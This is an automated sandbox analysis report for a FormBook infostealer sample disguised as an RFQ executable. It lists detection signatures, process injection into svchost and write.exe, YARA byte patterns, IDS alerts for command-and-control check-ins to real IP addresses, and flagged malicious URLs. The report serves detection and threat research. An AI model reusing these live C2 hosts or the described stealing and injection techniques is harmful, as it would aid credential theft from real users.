Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ - HTS45785-24-0907I000.exe

Overview

General Information

Sample name:RFQ - HTS45785-24-0907I000.exe
Analysis ID:1517661
MD5:8cd57235a1ba838df14c6a67ad2048d0
SHA1:4fed67f0abcef3c4327774b1d06bf7cf98684db9
SHA256:b0d625e9b21d2f7373775bfeac6ccf6cf362e24d79a61dd4829a82a1595c27f6
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ - HTS45785-24-0907I000.exe (PID: 4908 cmdline: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe" MD5: 8CD57235A1BA838DF14C6A67AD2048D0)
    • svchost.exe (PID: 4948 cmdline: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • TNPukQnytLH.exe (PID: 4324 cmdline: "C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 2564 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • TNPukQnytLH.exe (PID: 600 cmdline: "C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2104 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e2c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16472:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f0c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17272:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", CommandLine: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", ParentImage: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe, ParentProcessId: 4908, ParentProcessName: RFQ - HTS45785-24-0907I000.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", ProcessId: 4948, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", CommandLine: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", ParentImage: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe, ParentProcessId: 4908, ParentProcessName: RFQ - HTS45785-24-0907I000.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", ProcessId: 4948, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T05:35:15.961696+020028554651A Network Trojan was detected192.168.2.44978543.154.104.24780TCP
            2024-09-25T05:36:00.465759+020028554651A Network Trojan was detected192.168.2.4497373.33.130.19080TCP
            2024-09-25T05:36:24.659318+020028554651A Network Trojan was detected192.168.2.44974123.224.27.17380TCP
            2024-09-25T05:36:38.622547+020028554651A Network Trojan was detected192.168.2.44974552.187.43.7380TCP
            2024-09-25T05:36:52.085844+020028554651A Network Trojan was detected192.168.2.449749199.192.21.16980TCP
            2024-09-25T05:37:05.872212+020028554651A Network Trojan was detected192.168.2.44975381.2.196.1980TCP
            2024-09-25T05:37:19.986650+020028554651A Network Trojan was detected192.168.2.449757107.163.130.24980TCP
            2024-09-25T05:37:33.539792+020028554651A Network Trojan was detected192.168.2.44976152.223.13.4180TCP
            2024-09-25T05:37:51.441510+020028554651A Network Trojan was detected192.168.2.449765103.21.221.480TCP
            2024-09-25T05:38:05.079431+020028554651A Network Trojan was detected192.168.2.4497693.33.130.19080TCP
            2024-09-25T05:38:18.215404+020028554651A Network Trojan was detected192.168.2.4497733.33.130.19080TCP
            2024-09-25T05:38:31.546815+020028554651A Network Trojan was detected192.168.2.44977715.197.204.5680TCP
            2024-09-25T05:38:45.355247+020028554651A Network Trojan was detected192.168.2.449781198.252.106.19180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T05:36:17.043790+020028554641A Network Trojan was detected192.168.2.44973823.224.27.17380TCP
            2024-09-25T05:36:19.561257+020028554641A Network Trojan was detected192.168.2.44973923.224.27.17380TCP
            2024-09-25T05:36:22.108096+020028554641A Network Trojan was detected192.168.2.44974023.224.27.17380TCP
            2024-09-25T05:36:30.941997+020028554641A Network Trojan was detected192.168.2.44974252.187.43.7380TCP
            2024-09-25T05:36:33.485054+020028554641A Network Trojan was detected192.168.2.44974352.187.43.7380TCP
            2024-09-25T05:36:36.056953+020028554641A Network Trojan was detected192.168.2.44974452.187.43.7380TCP
            2024-09-25T05:36:44.452768+020028554641A Network Trojan was detected192.168.2.449746199.192.21.16980TCP
            2024-09-25T05:36:46.967510+020028554641A Network Trojan was detected192.168.2.449747199.192.21.16980TCP
            2024-09-25T05:36:49.520697+020028554641A Network Trojan was detected192.168.2.449748199.192.21.16980TCP
            2024-09-25T05:36:57.916189+020028554641A Network Trojan was detected192.168.2.44975081.2.196.1980TCP
            2024-09-25T05:37:00.549424+020028554641A Network Trojan was detected192.168.2.44975181.2.196.1980TCP
            2024-09-25T05:37:03.385479+020028554641A Network Trojan was detected192.168.2.44975281.2.196.1980TCP
            2024-09-25T05:37:12.116304+020028554641A Network Trojan was detected192.168.2.449754107.163.130.24980TCP
            2024-09-25T05:37:14.687022+020028554641A Network Trojan was detected192.168.2.449755107.163.130.24980TCP
            2024-09-25T05:37:17.435891+020028554641A Network Trojan was detected192.168.2.449756107.163.130.24980TCP
            2024-09-25T05:37:25.903194+020028554641A Network Trojan was detected192.168.2.44975852.223.13.4180TCP
            2024-09-25T05:37:28.431666+020028554641A Network Trojan was detected192.168.2.44975952.223.13.4180TCP
            2024-09-25T05:37:30.990421+020028554641A Network Trojan was detected192.168.2.44976052.223.13.4180TCP
            2024-09-25T05:37:40.526290+020028554641A Network Trojan was detected192.168.2.449762103.21.221.480TCP
            2024-09-25T05:37:43.073042+020028554641A Network Trojan was detected192.168.2.449763103.21.221.480TCP
            2024-09-25T05:37:45.620235+020028554641A Network Trojan was detected192.168.2.449764103.21.221.480TCP
            2024-09-25T05:37:56.950912+020028554641A Network Trojan was detected192.168.2.4497663.33.130.19080TCP
            2024-09-25T05:37:59.515904+020028554641A Network Trojan was detected192.168.2.4497673.33.130.19080TCP
            2024-09-25T05:38:03.022847+020028554641A Network Trojan was detected192.168.2.4497683.33.130.19080TCP
            2024-09-25T05:38:10.578940+020028554641A Network Trojan was detected192.168.2.4497703.33.130.19080TCP
            2024-09-25T05:38:14.182562+020028554641A Network Trojan was detected192.168.2.4497713.33.130.19080TCP
            2024-09-25T05:38:15.694756+020028554641A Network Trojan was detected192.168.2.4497723.33.130.19080TCP
            2024-09-25T05:38:23.734924+020028554641A Network Trojan was detected192.168.2.44977415.197.204.5680TCP
            2024-09-25T05:38:26.296932+020028554641A Network Trojan was detected192.168.2.44977515.197.204.5680TCP
            2024-09-25T05:38:29.014612+020028554641A Network Trojan was detected192.168.2.44977615.197.204.5680TCP
            2024-09-25T05:38:37.550175+020028554641A Network Trojan was detected192.168.2.449778198.252.106.19180TCP
            2024-09-25T05:38:40.238083+020028554641A Network Trojan was detected192.168.2.449779198.252.106.19180TCP
            2024-09-25T05:38:42.802640+020028554641A Network Trojan was detected192.168.2.449780198.252.106.19180TCP
            2024-09-25T05:38:52.432549+020028554641A Network Trojan was detected192.168.2.44978243.154.104.24780TCP
            2024-09-25T05:38:54.979831+020028554641A Network Trojan was detected192.168.2.44978343.154.104.24780TCP
            2024-09-25T05:38:57.526325+020028554641A Network Trojan was detected192.168.2.44978443.154.104.24780TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: RFQ - HTS45785-24-0907I000.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://tempatmudisini01.click/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqsAvira URL Cloud: Label: malware
            Source: http://www.tempatmudisini01.click/abla/Avira URL Cloud: Label: malware
            Source: http://www.tempatmudisini01.click/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIK8HYayGHDu+DpDN+18WI9ctL3WRi2TK2Q5c=&Vvn=XtJLE6KXyHJ010PAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: RFQ - HTS45785-24-0907I000.exeReversingLabs: Detection: 23%
            Source: RFQ - HTS45785-24-0907I000.exeVirustotal: Detection: 26%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: RFQ - HTS45785-24-0907I000.exeJoe Sandbox ML: detected
            Source: RFQ - HTS45785-24-0907I000.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000001.00000002.2168962083.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2168940553.0000000003200000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000002.4161153797.0000000001517000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000001.00000002.2168962083.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2168940553.0000000003200000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000002.4161153797.0000000001517000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TNPukQnytLH.exe, 00000005.00000002.4160485230.000000000098E000.00000002.00000001.01000000.00000005.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161291435.000000000098E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1744701582.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1745326700.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2073984809.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2076245715.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003900000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4161906836.0000000004740000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2169043412.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2172852458.0000000004595000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4161906836.00000000048DE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1744701582.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1745326700.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2073984809.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2076245715.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003900000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000006.00000002.4161906836.0000000004740000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2169043412.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2172852458.0000000004595000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4161906836.00000000048DE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000006.00000002.4162310977.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000006.00000002.4160569986.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.00000000027EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2462381400.000000001C7AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000006.00000002.4162310977.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000006.00000002.4160569986.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.00000000027EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2462381400.000000001C7AC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0086C340 FindFirstFileW,FindNextFileW,FindClose,6_2_0086C340
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then xor eax, eax6_2_00859A60
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then pop edi6_2_0085DF50
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then mov ebx, 00000004h6_2_046304E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49779 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 52.187.43.73:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 23.224.27.173:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49777 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 52.187.43.73:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 52.187.43.73:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 23.224.27.173:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 23.224.27.173:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49737 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 23.224.27.173:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 52.187.43.73:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 107.163.130.249:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 107.163.130.249:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49784 -> 43.154.104.247:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49781 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 107.163.130.249:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49783 -> 43.154.104.247:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49780 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49769 -> 3.33.130.190:80
